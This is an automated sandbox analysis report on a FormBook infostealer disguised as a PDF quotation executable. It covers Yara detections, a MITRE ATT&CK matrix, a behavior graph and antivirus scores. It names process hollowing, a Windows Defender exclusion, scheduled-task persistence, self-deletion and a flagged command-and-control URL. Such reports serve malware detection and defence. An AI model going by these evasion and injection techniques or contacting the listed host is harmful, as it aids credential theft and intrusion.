          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		512
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          Scheduled Task/Job          		11
          Disable or Modify Tools          		LSASS Memory321
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSync112
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 563220 Sample: QUOTATION PDF_SCAN_COPY.exe Startdate: 31/01/2022 Architecture: WINDOWS Score: 100 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 14 other signatures 2->50 10 QUOTATION PDF_SCAN_COPY.exe 7 2->10         started        process3 file4 36 C:\Users\user\AppData\Roaming\KHDScDG.exe, PE32 10->36 dropped 38 C:\Users\user\...\KHDScDG.exe:Zone.Identifier, ASCII 10->38 dropped 40 C:\Users\user\AppData\Local\...\tmp2DBB.tmp, XML 10->40 dropped 42 C:\Users\...\QUOTATION PDF_SCAN_COPY.exe.log, ASCII 10->42 dropped 52 Adds a directory exclusion to Windows Defender 10->52 54 Injects a PE file into a foreign processes 10->54 14 QUOTATION PDF_SCAN_COPY.exe 10->14         started        17 powershell.exe 24 10->17         started        19 schtasks.exe 1 10->19         started        signatures5 process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 70 Queues an APC in another process (thread injection) 14->70 21 explorer.exe 14->21 injected 23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        process8 process9 27 wlanext.exe 21->27         started        signatures10 56 Self deletion via cmd delete 27->56 58 Modifies the context of a thread in another process (thread injection) 27->58 60 Maps a DLL or memory area into another process 27->60 62 Tries to detect virtualization through RDTSC time measurements 27->62 30 cmd.exe 1 27->30         started        32 explorer.exe 124 27->32         started        process11 process12 34 conhost.exe 30->34         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION PDF_SCAN_COPY.exe43%VirustotalBrowse
          QUOTATION PDF_SCAN_COPY.exe29%MetadefenderBrowse
          QUOTATION PDF_SCAN_COPY.exe33%ReversingLabsByteCode-MSIL.Trojan.Woreflint
          QUOTATION PDF_SCAN_COPY.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\KHDScDG.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\KHDScDG.exe29%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\KHDScDG.exe33%ReversingLabsByteCode-MSIL.Trojan.Woreflint

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.faireez.club/n2t4/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.faireez.club/n2t4/true
          • Avira URL Cloud: safe
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.apache.org/licenses/LICENSE-2.0QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.fontbureau.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745478312.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.com/designersGQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com/designers/?QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/bTheQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers?QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.tiro.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.goodfont.co.krQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.carterandcone.comlQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.typography.netDQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/cTheQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/frere-user.htmlQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.jiyu-kobo.co.jp/QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/DPleaseQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers8QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fonts.comQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.sandoll.co.krQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaseQUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
